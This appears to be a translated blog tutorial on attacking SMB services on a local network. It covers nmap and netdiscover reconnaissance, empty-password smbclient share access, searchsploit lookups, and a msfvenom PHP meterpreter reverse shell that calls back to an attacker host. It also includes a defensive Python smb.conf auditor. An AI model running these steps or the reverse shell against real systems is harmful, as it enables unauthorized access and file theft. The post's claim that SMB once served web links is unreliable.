Exploitation of SMB information leakage

1. Background

This post looks at SMB information leakage. SMB (Server Message Block) is a network communication protocol that was once also used for web links and for communication between clients and servers on the web. Today almost all web pages use HTTP, so SMB sees little use in that field. On the other hand, SMB is still widely used to share files, printers and serial ports between computers; for example, "Network Neighborhood" on Windows is built on SMB.
SMB is a client/server, request/response protocol. Through SMB, client applications can read and write files on a server across a variety of network environments and make service requests to server programs; applications can also access files, printers and other resources on a remote server.
SMB runs over TCP, either directly or on top of NetBIOS; the usual ports are 139 and 445.

2. Principle of SMB leakage

SMB is a client/server protocol. Although it plays an important role in network file sharing, it also has security weaknesses that leave systems open to attack. Some common ones are:
1. Strong passwords are not enforced: early versions of the SMB protocol did not force users to choose strong passwords, which gives attackers an opening to crack them, for example by brute-forcing weak passwords.
2. NTLM authentication issues: NTLM (Windows NT LAN Manager) is the authentication protocol used with SMB, and its early versions have known weaknesses. Attackers can exploit them with man-in-the-middle or brute-force attacks.
3. SMB protocol version issues: some earlier versions of SMB have known vulnerabilities. On Kali, searchsploit can be used to look up the vulnerabilities for a given version together with the corresponding exploit scripts.
4. Buffer overflow: because SMB does not fully validate user input, an attacker can trigger a buffer overflow by sending a specially crafted request, leading to remote malicious code execution.
Since SMB has these weaknesses, let's look step by step at how SMB vulnerabilities are exploited.

3. Steps to exploit SMB information leakage

To exploit SMB vulnerabilities, you should mainly refer to the LAN Target Penetration Operation Guide. Next, let's look at how SMB vulnerabilities are exploited:

3.1 Find the target machine

To find the IP of the target machine on the LAN, use the netdiscover tool. The command format is: netdiscover -r ip/mask

3.2 Detect the services the target machine exposes and the versions of the software behind them

Use the nmap tool; the command format is: nmap -sV <target machine IP>

3.3 Find the SMB protocol and analyze the protocol

(a) For the SMB protocol, first try an empty password. If the empty password is accepted, log in and look for sensitive files:
smbclient -L IP // list the SMB shares, trying to log in with an empty password
smbclient '\\IP\share$' // open the share with an empty password, where share$ is one of the share names listed above
get sensitive_file // download a file
(b) For SMB remote overflow vulnerabilities:
searchsploit samba <version number> // search for SMB remote overflow vulnerabilities and analyze them
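The empty-password share access in (a), and the weak-password, NTLMv1 and old-version issues listed in section 2, map onto a handful of Samba settings. The following Python script is an added example, not code from the original post: it audits an smb.conf for those settings, using two constructed configurations, a permissive one of the kind this walkthrough relies on and a corrected one. The parameters it checks (map to guest, restrict anonymous, server min protocol, ntlm auth, guest ok) are real Samba parameters; the share name, path and group are made up for the example.

```python
"""Audit an smb.conf for the weak settings discussed in the text (added example).

Checks: guest/anonymous share access, null sessions to IPC$, SMB1 dialects,
and NTLMv1. The two configurations below are constructed for this example.
"""
import re

# Constructed: a permissive configuration of the kind the walkthrough exploits
# (guest access to a "share$" share, SMB1 allowed, NTLMv1 allowed).
WEAK_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User
   server min protocol = NT1
   ntlm auth = yes

[share$]
   # hypothetical path for the example
   path = /srv/samba/share
   guest ok = yes
   read only = no
"""

# Constructed: the same share with the settings corrected.
HARDENED_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Never
   restrict anonymous = 2
   server min protocol = SMB3
   ntlm auth = ntlmv2-only
   server signing = mandatory

[share$]
   # hypothetical path and group for the example
   path = /srv/samba/share
   guest ok = no
   valid users = @staff
   read only = yes
"""


def parse_smb_conf(text):
    """Parse ini-style smb.conf text into {section: {key: value}}.

    Keys are lowercased; blank lines and lines starting with '#' or ';'
    are skipped, matching how Samba reads its own configuration.
    """
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        match = re.match(r"\[(.+)\]$", line)
        if match:
            section = match.group(1).strip()
            conf.setdefault(section, {})
            continue
        if section is not None and "=" in line:
            key, _, value = line.partition("=")
            conf[section][key.strip().lower()] = value.strip()
    return conf


def is_yes(value):
    """Samba accepts yes/true/1 for boolean parameters."""
    return value.strip().lower() in ("yes", "true", "1")


def audit(text):
    """Return a list of findings; an empty list means none of the checked weaknesses is present."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []

    # Guest mapping: anything but Never turns failed logins into guest sessions.
    if g.get("map to guest", "Never").lower() != "never":
        findings.append(f"global: map to guest = {g['map to guest']} maps failed logins to a guest session")

    # Null sessions: below 2, anonymous IPC$ connections can list shares (smbclient -L with no password).
    if int(g.get("restrict anonymous", "0")) < 2:
        findings.append("global: restrict anonymous < 2 permits null sessions to IPC$, so shares can be listed without a password")

    # Dialects: anything below SMB2 offers SMB1 (NT1 and older), the family the old remote overflows targeted.
    proto = g.get("server min protocol", "").upper()
    if not proto.startswith(("SMB2", "SMB3")):
        findings.append(f"global: server min protocol = {proto or '(unset)'}; SMB1 dialects are offered "
                        "(Samba before 4.11 defaults to NT1)")

    # NTLM: 'yes' accepts NTLMv1 responses, which are weak against offline cracking and relay.
    if is_yes(g.get("ntlm auth", "ntlmv2-only")):
        findings.append("global: ntlm auth = yes accepts NTLMv1 responses")

    # Per-share guest access ('public' is a synonym for 'guest ok').
    for name, opts in conf.items():
        if name == "global":
            continue
        if is_yes(opts.get("guest ok", opts.get("public", "no"))):
            findings.append(f"share {name}: guest ok = yes allows access with an empty password")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {len(audit(conf))} finding(s)")
        for finding in audit(conf):
            print("  -", finding)
```

Run it with python3, or pass the contents of a real /etc/samba/smb.conf to audit(); an empty list means none of the checked weaknesses is present. Anything flagged as unset is worth confirming against your Samba version, since the defaults for server min protocol and ntlm auth changed in later releases.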

3.4 Based on the vulnerability found in 3.3, we can build a reverse shell

The reverse shell is built mainly with the metasploit tool.
For example, I built a TCP reverse webshell for the PHP framework, using the payload php/meterpreter/reverse_tcp:

msfvenom -p php/meterpreter/reverse_tcp lhost=<attacking machine IP> lport=4444 -f raw

Build the webshell and run it.
Then start metasploit on the attacking machine and listen for the connection:

msfconsole // start metasploit
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <attacking machine IP>
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

As soon as someone triggers the PHP reverse shell script, the attacking machine obtains a session on the server.

4. Summary

SMB appeared early and is very widely used. However, early computer protocols focused on getting applications up quickly and had no strict security requirements, so many older devices still use vulnerable versions of SMB, which creates security risks. When we exploit SMB vulnerabilities, we rely mainly on payloads provided by msf. These payloads were written by others, so they are very convenient to use, which also shows from another angle that anyone who wants to attack SMB has an easy time of it. So we need to give more thought to protecting our computers: keep the necessary security settings in place, and do not turn off every security protection for the sake of temporary convenience. If you don't quite understand something or have other ideas, you can send me a private message or leave a comment. Please forgive any mistakes in my writing.

Origin blog.csdn.net/Scalzdp/article/details/134457052